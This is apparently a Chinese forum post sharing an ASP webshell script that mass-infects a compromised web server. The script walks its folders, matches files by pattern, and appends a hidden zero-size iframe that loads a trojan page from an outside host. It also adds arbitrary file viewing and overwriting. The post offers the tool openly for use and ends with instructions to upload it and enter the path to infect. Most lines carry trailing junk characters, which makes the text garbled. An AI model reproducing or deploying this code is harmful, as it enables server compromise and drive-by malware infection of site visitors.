一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^ U@).jpN
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If ex<>"" AND pth<>"" Then B /3~[ '
select Case ex }N-UlL(
Case "edit" XelFGT E
CALL file_show(pth) W20- oZ8
Case "save" .(Ux1.0C
CALL file_save(pth) >.P*lT
End select qU6!vgM&
Else gmu.8
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Function IsPattern(patt,str) yg}L,JJU<
Set regEx=New RegExp < q(i(%
regEx.Pattern=patt yD3vq}U!
regEx.IgnoreCase=True }mp`!7?>O
retVal=regEx.Test(str) P JKY$s.
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sch s 5C*Zb3VG4
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End If /Tl ybSC1
Sub sch(s) 8z=o.\@
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Set fs=Server.createObject("Scripting.FileSystemObject") 4ybOK~z
Set fd=fs.GetFolder(s) oKSW:A
Set fi=fd.Files $(J)F-DB i
Set sf=fd.SubFolders wAR:GO'n
For Each f in fi .wm<l:
rtn=f.Path ZPM7R3%V)z
step_all rtn T5 pc%%q
Next <5]_u:
If sf.Count<>0 Then 4mBM5Tv
For Each l In sf UlN}SddI9
sch l /Y\q&}
Next -{eiV0<^
End If 7 je1vNs
End Sub T;3~teVYB
Sub step_all(agr) vA*NJ%&`
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If retVal Then {XhpxJ__
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End Sub e!i.u'z
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Sub step2(str2) 0\$Lnwp_
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" :]C\DUBo
Set fs=Server.createObject("Scripting.FileSystemObject") JLyFkV/
isExist=fs.FileExists(str2) Z.>?Dt
If isExist Then !})3Fb
Set f=fs.GetFile(str2) 5U<o%+^El
Set f_addcode=f.OpenAsTextStream(8,-2) A]V<K[9:b
f_addcode.Write addcode mW_A3S5
f_addcode.Close Q%GLT,f1.
Set f=Nothing SR)@'-Wd
End If '?fn} V
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End Sub v g tJ+GjN
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Sub file_show(fname) HZ2 zL17
Set fs1=Server.createObject("Scripting.FileSystemObject") KRcg
isExist=fs1.FileExists(fname) VxAR,a1+n
If isExist Then v:j4#pEWD
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cnt=fcnt.ReadAll Sag\wKV8
fcnt.Close VHws9)
Set fs1=Nothing%> ]Otl(\v(h
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<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> !lB,2_
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</form> z<P#djx
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<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p> 2I39fZa
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End If 8c$IsvJg
End Sub &l|B>{4v
%> r>q`# ~
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Sub file_save(fname) J.`.lQ$z
Set fs2=Server.createObject("Scripting.FileSystemObject") *XzUqK
Set newf=fs2.createTextFile(fname,True) u09OnP\
newf.Write newcnt kp;MNRc
newf.Close e S
Set fs2=Nothing [K9q+
End Sub +~/zCJ;F
%> \J\1i=a-=
</body> CblL1 q8
</html> |s`q+ U -
传进服务器以后 直接输入需要挂马的路径就可以直接挂了